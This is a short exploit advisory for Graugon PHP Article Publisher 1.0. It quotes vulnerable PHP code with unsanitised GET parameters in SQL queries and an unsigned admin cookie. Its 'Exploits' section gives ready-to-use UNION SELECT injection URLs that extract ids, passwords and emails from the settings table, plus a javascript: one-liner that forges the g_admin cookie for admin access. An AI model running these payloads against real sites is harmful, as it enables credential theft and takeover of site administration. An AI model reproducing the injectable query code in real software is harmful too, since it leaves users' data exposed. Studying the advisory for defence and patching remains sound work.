Graugon PHP Article Publisher version 1.0 suffers from remote SQL injection and insecure cookie handling vulnerabilities.
9e64a422a7ec75251330e7952ccfb94a8f0989be6fbd92c49e3ed5597aaa394b
#########################################################################################
[0x01] Informations:
Name : Graugon PHP Article Publisher 1.0
Download : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability : Multiple Sql Injections / Insecure Cookie Handling
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged Page: index.php [..] admin.php [..] view.php
[Code]
$c = $_GET['c'];
$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]
[code]
$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);
[/code]
[code]
$id = $_GET['id']; [..]
$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]
#########################################################################################
[0x03] Exploits:
Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
javascript:document.cookie ="g_admin=1; path=/"
########################################################################################